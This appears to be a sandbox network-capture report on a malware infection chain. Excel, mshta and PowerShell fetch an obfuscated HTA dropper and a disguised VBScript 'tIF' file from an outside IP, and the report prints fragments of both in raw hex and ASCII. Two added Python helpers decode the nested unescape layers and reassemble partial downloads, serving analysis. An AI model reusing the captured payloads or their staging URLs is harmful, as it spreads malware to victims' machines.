                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/hta
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 32 35 33 44 25 [TRUNCATED]
                                              Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScript%25252520laNgUAGE%2525253D%25252522vbScRiPt%25252522%2525253E%2525250ADiM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                              Sep 9, 2024 17:48:56.908268929 CEST | 1236 | IN | Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30
                                              Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
                                              Sep 9, 2024 17:48:56.908297062 CEST | 1236 | IN | Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                              Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                              Sep 9, 2024 17:48:56.908314943 CEST | 1236 | IN | Data Raw: 43 6b 6e 6d 6c 6d 71 50 4a 4d 72 41 79 4e 74 6e 54 56 59 43 65 70 69 6e 72 48 5a 73 43 54 65 61 59 4a 45 57 70 48 6b 58 54 6c 4b 51 6d 76 43 72 54 71 4b 45 6c 68 52 48 59 75 4b 6f 44 75 50 67 56 52 6a 59 41 55 4d 72 46 73 78 70 4e 62 65 43 49 44
                                              Data Ascii: CknmlmqPJMrAyNtnTVYCepinrHZsCTeaYJEWpHkXTlKQmvCrTqKElhRHYuKoDuPgVRjYAUMrFsxpNbeCIDgQapQrWzIKsQZZWcTdTVmguArDeAoeOdaVyIvzKqInY%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:56.908350945 CEST | 896 | IN | Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:56.908366919 CEST | 1236 | IN | Data Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                              Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                              Sep 9, 2024 17:48:56.908406019 CEST | 1236 | IN | Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                              Sep 9, 2024 17:48:56.908488989 CEST | 448 | IN | Data Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                              Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                              Sep 9, 2024 17:48:56.908513069 CEST | 1236 | IN | Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:56.908535004 CEST | 224 | IN | Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                              Sep 9, 2024 17:48:56.913536072 CEST | 1236 | IN | Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                              Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
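
The 200 response above is the HTA wrapped in nested document.write(unescape("...")) calls. Every %25 in the capture is a percent sign that was itself percent-encoded, so a run such as %25252520 is a single space encoded four times: three literal document.write(unescape(...)) wrappers, then an innermost JavaScript stub of the form m='...' whose value is unescaped once more before it is written. The decoder below is an added example written for this report, not code from the sandbox or from the dropper. It emulates JScript's unescape() (which also understands %uXXXX, unlike urllib's unquote), resolves the single-variable indirection the capture shows, and reports the deepest encoding run as a triage metric that needs no decoding. The fixture is constructed to have that same four-layer shape; it is not the captured file.

```python
"""Peel nested document.write(unescape("...")) layers out of an HTA body.

Added example for this report: not sandbox output and not the dropper's code.
The fixture mirrors the shape seen in the capture (percent-encoded layers with
an innermost m='...' indirection) but is constructed, not the captured file.
"""
import re

_PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """JScript unescape(): %uXXXX -> code unit, %XX -> char code, anything else verbatim."""
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s: str) -> str:
    """JScript escape(), used here only to build the fixture."""
    out = []
    for ch in s:
        o = ord(ch)
        if (o < 128 and ch.isalnum()) or ch in "@*_+-./":
            out.append(ch)
        elif o < 256:
            out.append(f"%{o:02X}")
        else:
            out.append(f"%u{o:04X}")
    return "".join(out)


# unescape("<literal>"), unescape('<literal>') or unescape(<identifier>)
_CALL = re.compile(
    r"""unescape\s*\(\s*(?:(["'])(?P<lit>.*?)\1|(?P<var>[A-Za-z_$][\w$]*))\s*\)""", re.S
)


def _string_var(text: str, name: str):
    """Resolve `name = '...'` to its literal, or None if the name is not a plain string."""
    pat = r"(?<![\w$])" + re.escape(name) + r"""\s*=\s*(["'])(.*?)\1"""
    m = re.search(pat, text, re.S)
    return m.group(2) if m else None


def peel(text: str, max_layers: int = 32) -> list:
    """Return every layer, outermost first; the last entry is the innermost script."""
    layers = [text]
    for _ in range(max_layers):
        m = _CALL.search(layers[-1])
        if not m:
            break
        body = m.group("lit")
        if body is None:
            body = _string_var(layers[-1], m.group("var"))
            if body is None:
                break
        layers.append(js_unescape(body))
    return layers


_RUN = re.compile(r"%(?:25)+[0-9A-Fa-f]{2}")


def max_encoding_depth(text: str) -> int:
    """How many times the most-wrapped byte was percent-encoded, read off %2525..XX runs without decoding."""
    return max(((len(m.group(0)) - 3) // 2 + 1 for m in _RUN.finditer(text)), default=0)


PAYLOAD = (
    '<Script Language="VBScript">\n'
    'Dim banner: banner = "constructed fixture, not the captured script"\n'
    "MsgBox banner\n"
    "</Script>"
)


def build_fixture(payload: str, wraps: int = 3) -> str:
    """m='<escaped payload>';document.write(unescape(m)) wrapped in `wraps` literal layers."""
    doc = "<script language=JavaScript>m='" + js_escape(payload) + "';document.write(unescape(m))</script>"
    for _ in range(wraps):
        doc = '<script>\n<!--\ndocument.write(unescape("' + js_escape(doc) + '"))\n//-->\n</script>'
    return doc


if __name__ == "__main__":
    hta = build_fixture(PAYLOAD)
    print("deepest percent-encoding run:", max_encoding_depth(hta))
    layers = peel(hta)
    print("layers peeled:", len(layers) - 1)
    print(layers[-1])
```

On a real capture, feed peel() the reassembled response body rather than one TCP segment: the unescape("...") literal spans the whole file, and a segment boundary inside it leaves the regex with no closing quote to match.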


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.22 | 49166 | 185.235.137.223 | 80 | 3504 | C:\Windows\System32\mshta.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 9, 2024 17:48:58.933820009 CEST | 437 | OUT | GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-US
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Range: bytes=8896-
                                              If-Range: "24cb3-621aa877cb395"
                                              Sep 9, 2024 17:48:59.517690897 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
                                              Date: Mon, 09 Sep 2024 15:48:59 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:16:01 GMT
                                              ETag: "24cb3-621aa877cb395"
                                              Accept-Ranges: bytes
                                              Content-Length: 141811
                                              Content-Range: bytes 8896-150706/150707
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/hta
                                              Data Raw: 32 35 32 35 32 35 32 30 77 53 72 61 75 61 61 58 59 72 67 44 75 79 53 6c 6a 65 6d 44 57 50 43 46 69 6d 53 57 48 44 53 71 4c 5a 56 73 65 4c 41 44 4d 65 48 49 6a 58 51 61 50 73 62 77 4b 73 65 6c 44 6d 70 76 55 52 67 6f 75 6c 78 66 51 45 4e 6b 4e 74 4f 69 59 4a 72 76 4e 54 72 58 4c 7a 6b 74 49 76 76 65 52 6c 6f 56 73 52 65 50 59 76 76 53 55 41 4a 46 69 77 62 41 58 56 72 4b 74 58 44 64 72 64 74 78 55 42 57 6c 42 66 59 59 59 59 67 45 66 4d 41 42 6a 59 45 70 70 4d 69 69 64 43 50 72 42 79 73 64 79 41 4f 6d 4f 72 6f 67 6b 62 43 77 6d 74 76 79 77 66 47 50 4b 49 5a 56 6b 62 45 6d 67 55 79 78 59 59 79 61 64 4f 69 52 66 75 73 75 6e 49 43 58 70 46 53 65 64 58 58 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 [TRUNCATED]
                                              Data Ascii: 25252520wSrauaaXYrgDuySljemDWPCFimSWHDSqLZVseLADMeHIjXQaPsbwKselDmpvURgoulxfQENkNtOiYJrvNTrXLzktIvveRloVsRePYvvSUAJFiwbAXVrKtXDdrdtxUBWlBfYYYYgEfMABjYEppMiidCPrBysdyAOmOrogkbCwmtvywfGPKIZVkbEmgUyxYYyadOiRfusunICXpFSedXX%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.517716885 CEST | 1236 | IN | Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.517729044 CEST | 1236 | IN | Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                              Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                              Sep 9, 2024 17:48:59.517841101 CEST | 672 | IN | Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.517851114 CEST | 1236 | IN | Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                              Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                              Sep 9, 2024 17:48:59.517862082 CEST | 1236 | IN | Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.518002987 CEST | 1236 | IN | Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                              Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                              Sep 9, 2024 17:48:59.518014908 CEST | 1236 | IN | Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                              Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                              Sep 9, 2024 17:48:59.518028021 CEST | 1236 | IN | Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                              Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                              Sep 9, 2024 17:48:59.518039942 CEST | 1236 | IN | Data Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                              Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                              Sep 9, 2024 17:48:59.522772074 CEST | 1236 | IN | Data Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                              Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
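
The mshta.exe request above carries Range: bytes=8896- and an If-Range whose value equals the ETag of the first response ("24cb3-621aa877cb395"), and the server answers 206 with Content-Range: bytes 8896-150706/150707, the same total as the first response's Content-Length. It is therefore fetching the rest of the file EXCEL.EXE had already started to pull. Recovering the complete HTA from the pcap means stitching the 200 body and the 206 body together and checking that the pieces agree on ETag and total length, since a changed ETag would mean the server served a different file the second time. The reassembler below is an added example, not sandbox code; the responses it runs on are constructed stand-ins (a 772-byte blob) with the same header shape as the capture.

```python
"""Stitch a truncated 200 body and a later 206 Range body back into one file.

Added example, not part of the sandbox report. The responses it runs on are
constructed stand-ins (a 772-byte blob); only their header shape follows the
capture: a full GET whose body may be cut short, then a Range/If-Range
re-request for the remainder carrying the same ETag and total length.
"""
import re

_RANGE = re.compile(r"bytes (\d+)-(\d+)/(\d+)")


def parse_content_range(value: str):
    """'bytes 8896-150706/150707' -> (8896, 150706, 150707)."""
    m = _RANGE.fullmatch(value.strip())
    if not m:
        raise ValueError(f"unsupported Content-Range: {value!r}")
    first, last, total = (int(x) for x in m.groups())
    if first > last or last >= total:
        raise ValueError(f"inconsistent Content-Range: {value!r}")
    return first, last, total


def reassemble(responses):
    """Merge 200/206 responses for one resource.

    Each response is {"status": int, "headers": {...}, "body": bytes}.
    Returns (data, gaps): data is the reconstructed file (unfilled bytes are
    zero) and gaps lists (first, last) ranges no response covered. An ETag or
    total-length disagreement between pieces raises ValueError.
    """
    total, etag, pieces = None, None, []
    for r in responses:
        h = {k.lower(): v for k, v in r["headers"].items()}
        if etag is None:
            etag = h.get("etag")
        elif h.get("etag") != etag:
            raise ValueError("ETag changed between responses; the server's file changed")
        if r["status"] == 200:
            first, size = 0, int(h["content-length"])
        elif r["status"] == 206:
            first, last, size = parse_content_range(h["content-range"])
            if len(r["body"]) > last - first + 1:
                raise ValueError("206 body longer than its Content-Range")
        else:
            continue
        if total is None:
            total = size
        elif size != total:
            raise ValueError("total length disagrees between responses")
        pieces.append((first, r["body"][: size - first]))
    if total is None:
        raise ValueError("no 200/206 response to reassemble")
    data, covered = bytearray(total), bytearray(total)
    for first, body in pieces:
        data[first:first + len(body)] = body
        covered[first:first + len(body)] = b"\x01" * len(body)
    gaps, i = [], 0
    while i < total:
        if covered[i]:
            i += 1
            continue
        j = i
        while j < total and not covered[j]:
            j += 1
        gaps.append((i, j - 1))
        i = j
    return bytes(data), gaps


BLOB = bytes(range(256)) * 3 + b"tail"  # constructed 772-byte stand-in for the HTA


def demo_responses(blob: bytes, cut: int, resume_at: int):
    """A 200 whose captured body stops at `cut`, then a 206 for bytes resume_at..end."""
    etag = '"constructed-etag"'
    return [
        {"status": 200,
         "headers": {"ETag": etag, "Content-Length": str(len(blob))},
         "body": blob[:cut]},
        {"status": 206,
         "headers": {"ETag": etag,
                     "Content-Range": f"bytes {resume_at}-{len(blob) - 1}/{len(blob)}"},
         "body": blob[resume_at:]},
    ]


if __name__ == "__main__":
    data, gaps = reassemble(demo_responses(BLOB, 400, 300))
    print("complete:", data == BLOB, "gaps:", gaps)
    data, gaps = reassemble(demo_responses(BLOB, 400, 500))
    print("with a hole, gaps:", gaps)
```

An empty gap list is the signal that the reconstructed file is complete; any gap means the pcap lost segments and the resulting file should not be hashed or submitted as the original.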


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.22 | 49167 | 185.235.137.223 | 80 | 3612 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 9, 2024 17:49:03.721335888 CEST | 358 | OUT | GET /200/pictureupdatedwithnewquality.tIF HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:49:04.335088015 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:49:04 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:12:50 GMT
                                              ETag: "2f69e-621aa7c1ac6e2"
                                              Accept-Ranges: bytes
                                              Content-Length: 194206
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: image/tiff
                                              Data Raw: ff fe 75 00 57 00 62 00 47 00 67 00 57 00 6c 00 6d 00 47 00 4c 00 69 00 66 00 20 00 3d 00 20 00 22 00 50 00 57 00 7a 00 66 00 57 00 50 00 70 00 55 00 7a 00 69 00 4e 00 71 00 22 00 0d 00 0a 00 75 00 70 00 4c 00 4f 00 63 00 7a 00 5a 00 57 00 70 00 4c 00 57 00 64 00 20 00 3d 00 20 00 22 00 4c 00 57 00 57 00 4f 00 57 00 57 00 57 00 6b 00 61 00 47 00 76 00 6e 00 22 00 0d 00 0a 00 57 00 4c 00 6a 00 69 00 41 00 48 00 78 00 55 00 70 00 6d 00 4b 00 55 00 20 00 3d 00 20 00 22 00 4c 00 6f 00 5a 00 55 00 68 00 69 00 65 00 65 00 41 00 47 00 75 00 4b 00 22 00 0d 00 0a 00 62 00 6d 00 71 00 63 00 57 00 62 00 48 00 4b 00 62 00 6b 00 69 00 42 00 20 00 3d 00 20 00 22 00 74 00 4c 00 7a 00 6e 00 6a 00 6d 00 4e 00 47 00 65 00 41 00 41 00 69 00 22 00 0d 00 0a 00 41 00 41 00 6f 00 4c 00 61 00 5a 00 4e 00 57 00 4e 00 65 00 4c 00 68 00 20 00 3d 00 20 00 22 00 64 00 47 00 61 00 41 00 4e 00 65 00 47 00 71 00 6d 00 6c 00 4a 00 62 00 22 00 0d 00 0a 00 50 00 55 00 6b 00 72 00 52 00 4b 00 55 00 62 00 78 00 4e 00 6f 00 6d 00 20 00 [TRUNCATED]
                                              Data Ascii: uWbGgWlmGLif = "PWzfWPpUziNq"upLOczZWpLWd = "LWWOWWWkaGvn"WLjiAHxUpmKU = "LoZUhieeAGuK"bmqcWbHKbkiB = "tLznjmNGeAAi"AAoLaZNWNeLh = "dGaANeGqmlJb"PUkrRKUbxNom = "eohGcelchHoI"KWNIPuLLZupC = "LihfgmqziLLL"TvPnzkABapxP = "PWCxUQKGifaO"UcLtcmLNpmvW = "zWLPSLLassLL"cxRxKtaUOzoW = "GqCzGcbLNTZk"ULACxGWWcGmZ = "ZguCiKLWeoKp"WKhJWKkqQRux = "xkLWCUcNbfbd"xLPOhduLUbog = "LKZpmPWKLLLc"PmgLOuWhRlLO = "ZoAnkxbetGWe"TRApioGknckc = "kLiLidRS
